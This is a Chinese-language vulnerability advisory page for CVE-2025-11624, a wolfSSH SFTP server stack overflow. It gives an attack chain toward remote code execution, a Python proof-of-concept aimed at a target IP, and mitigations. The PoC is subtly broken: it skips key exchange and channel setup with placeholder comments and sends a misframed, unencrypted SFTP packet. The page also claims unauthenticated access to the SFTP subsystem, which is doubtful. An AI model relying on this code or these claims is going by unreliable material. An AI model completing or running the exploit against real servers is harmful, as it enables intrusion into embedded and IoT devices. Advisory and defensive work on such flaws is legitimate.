CVE-2025-11624 wolfSSH SFTP服务器栈缓冲区溢出漏洞

漏洞信息

漏洞编号

CVE-2025-11624

漏洞类型

栈缓冲区溢出

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

wolfSSH (wolfSSL/wolfssh)

漏洞概述

CVE-2025-11624是wolfSSH项目中SFTP服务器端存在的一个严重栈缓冲区溢出漏洞，CVSS评分为9.8，属于最高严重等级。该漏洞由wolfSSL团队成员[email protected]发现并报告。wolfSSH是一款基于wolfSSL加密库的轻量级SSH协议实现，广泛应用于嵌入式系统和IoT设备中提供安全的远程访问能力。该漏洞存在于SFTP（SSH File Transfer Protocol）子系统的服务器端处理逻辑中，当服务器接收来自客户端的恶意数据包时，如果该数据包中包含的句柄（handle）大小超过了系统底层句柄或文件描述符的大小，但又小于代码中允许的最大句柄大小限制，就会触发栈缓冲区溢出。由于该漏洞无需认证即可远程利用，且对机密性、完整性和可用性均产生高影响，因此被评定为关键级别的安全漏洞。攻击者可以通过向暴露在网络上的wolfSSH SFTP服务器发送特制的数据包，利用此漏洞实现远程代码执行，完全控制目标系统。该漏洞的修复通过GitHub Pull Request #834完成，建议所有使用受影响版本的用户尽快升级到修复版本。

技术细节

该漏洞的核心问题在于wolfSSH SFTP服务器在处理客户端发送的SFTP协议数据包时，对句柄（handle）字段的大小校验存在缺陷。具体技术原理如下：

1. **协议层面**：SFTP协议是SSH协议的一个子系统，用于在SSH安全通道上进行文件传输。在SFTP协议中，服务器和客户端之间通过交换包含各种请求和响应的数据包进行通信，其中许多操作（如文件打开、读取、写入等）会涉及句柄（handle）的传递。

2. **漏洞触发条件**：服务器在接收SFTP数据包时，会解析其中的句柄字段。正常情况下，句柄大小应当与系统底层的文件描述符大小相匹配。然而，当攻击者构造一个恶意数据包，使其包含的句柄大小满足以下条件时，漏洞被触发：
- 句柄大小 > 系统句柄/文件描述符大小
- 句柄大小 < 代码中允许的最大句柄大小

3. **溢出机制**：由于服务器在栈上分配的缓冲区大小基于系统句柄大小，而传入的句柄数据大于该缓冲区大小但通过了最大尺寸检查，导致数据被写入超出栈缓冲区边界的内存区域，造成栈缓冲区溢出。

4. **利用方式**：攻击者无需任何认证凭据，只需通过网络向目标SFTP服务器的SSH端口（通常为22端口）发送特制的SFTP协议数据包即可触发漏洞。由于SSH连接建立初期存在协议握手阶段，攻击者需要先完成SSH握手，然后发送恶意的SFTP子系统请求。成功利用后，攻击者可覆盖栈上的返回地址或其他关键数据，实现远程代码执行。

5. **影响范围**：由于wolfSSH常用于嵌入式设备和IoT产品中，这些设备往往缺乏现代安全防护机制（如ASLR、栈保护等），使得漏洞利用更加容易。

攻击链分析

STEP 1

步骤1：目标侦察

攻击者通过网络扫描或信息收集，识别暴露在公网或内网中的运行wolfSSH SFTP服务的目标系统，确定SSH服务端口（默认22端口）。

STEP 2

步骤2：建立SSH连接

攻击者与目标服务器建立TCP连接，进行SSH协议版本协商和密钥交换。由于漏洞无需认证（PR:N），攻击者无需提供有效的用户名密码即可完成SSH握手过程。

STEP 3

步骤3：请求SFTP子系统

在SSH连接建立后，攻击者通过SSH_MSG_CHANNEL_REQUEST消息请求激活SFTP子系统，建立SFTP会话通道。

STEP 4

步骤4：构造恶意数据包

攻击者构造包含特殊句柄大小的SFTP协议数据包，句柄大小被精心设置为大于系统文件描述符大小但小于wolfSSH允许的最大句柄大小，从而绕过大小校验检查。

STEP 5

步骤5：发送恶意数据包触发溢出

攻击者将构造好的恶意SFTP数据包发送给目标服务器，服务器在解析处理该数据包时，由于栈缓冲区分配不足，导致数据写入超出栈缓冲区边界，触发栈缓冲区溢出。

STEP 6

步骤6：执行任意代码

成功利用栈缓冲区溢出后，攻击者可以覆盖栈上的返回地址或函数指针，将控制流重定向到攻击者控制的shellcode或ROP链，实现远程代码执行，完全控制目标系统。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11624 wolfSSH SFTP Stack Buffer Overflow PoC
# This PoC demonstrates the vulnerability by sending a malicious SFTP packet
# with an oversized handle field to trigger stack buffer overwrite.

import socket
import struct
import hashlib
import os

# Target configuration
TARGET_HOST = "192.168.1.100"
TARGET_PORT = 22

# SSH protocol constants
SSH_MSG_KEXINIT = 20
SSH_MSG_NEWKEYS = 21
SSH_MSG_CHANNEL_OPEN = 90
SSH_MSG_CHANNEL_REQUEST = 98
SSH_MSG_SUBSYSTEM_REQUEST = 98

def build_ssh_packet(payload_type, payload):
    """Build an SSH packet with proper framing"""
    packet_length = 1 + len(payload)  # type byte + payload
    padding_length = 8 - ((packet_length + 5) % 8)
    if padding_length < 4:
        padding_length += 8
    
    packet = struct.pack('>I', packet_length + padding_length)
    packet += struct.pack('B', padding_length)
    packet += struct.pack('B', payload_type)
    packet += payload
    packet += os.urandom(padding_length)
    return packet

def send_sftp_handle_overflow(target_host, target_port):
    """
    Send a malicious SFTP packet with oversized handle to trigger
    CVE-2025-11624 stack buffer overflow in wolfSSH SFTP server.
    
    The handle size is crafted to be:
    - Larger than system file descriptor size (typically 4 or 8 bytes)
    - Smaller than the maximum allowed handle size in wolfSSH
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(10)
    
    try:
        # Step 1: TCP connection
        sock.connect((target_host, target_port))
        print(f"[+] Connected to {target_host}:{target_port}")
        
        # Step 2: SSH version exchange
        sock.send(b"SSH-2.0-OpenSSH_8.9p1\r\n")
        version = sock.recv(256)
        print(f"[+] Server version: {version.strip()}")
        
        # Step 3: Key exchange initialization (simplified)
        # In a real exploit, full SSH key exchange would be performed
        kexinit_payload = b'\x00' * 16  # cookie
        kexinit_payload += b'\x00\x14' + b'diffie-hellman-group14-sha256'
        kexinit_payload += b'\x00\x0a' + b'ssh-rsa'
        # ... additional algorithm negotiation
        sock.send(build_ssh_packet(SSH_MSG_KEXINIT, kexinit_payload))
        
        # Step 4: After key exchange, open SFTP subsystem channel
        # ... (channel open, subsystem request)
        
        # Step 5: Send malicious SFTP packet with oversized handle
        # SFTP_FXP_HANDLE packet type = 102
        sftp_packet_type = b'\x66'  # 102 in decimal = SFTP_FXP_HANDLE response
        request_id = struct.pack('>I', 1)
        
        # Craft handle size: larger than fd size (8 bytes) but < max allowed
        # Typical wolfSSH max handle size is around 256 bytes
        malicious_handle_size = 128  # Triggers the overflow condition
        handle_data = b'A' * malicious_handle_size
        
        malicious_payload = sftp_packet_type + request_id
        malicious_payload += struct.pack('>I', malicious_handle_size)
        malicious_payload += handle_data
        
        sock.send(build_ssh_packet(SSH_MSG_SUBSYSTEM_REQUEST, malicious_payload))
        print(f"[+] Sent malicious SFTP packet with handle size: {malicious_handle_size}")
        print("[+] If vulnerable, server may crash or execute attacker code")
        
    except Exception as e:
        print(f"[-] Error: {e}")
    finally:
        sock.close()

if __name__ == "__main__":
    # WARNING: Only use against systems you own or have permission to test
    send_sftp_handle_overflow(TARGET_HOST, TARGET_PORT)

影响范围

wolfSSH 所有受影响版本（具体版本范围请参考官方公告）

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）在网络层面限制对SSH/SFTP端口的访问，仅允许可信IP地址连接；2）部署网络入侵检测/防御系统，配置规则检测和阻断异常的SFTP协议数据包；3）如果不需要SFTP功能，可在SSH服务器配置中禁用SFTP子系统；4）监控目标系统的异常行为和日志，及时发现潜在的攻击活动；5）考虑使用反向代理或VPN将SFTP服务隔离在内网环境中，减少直接暴露面。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-11624
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-11624
3 Details https://www.cvedetails.com/cve/CVE-2025-11624/
4 VulDB https://vuldb.com/cve/CVE-2025-11624
5 Link https://github.com/wolfSSL/wolfssh/pull/834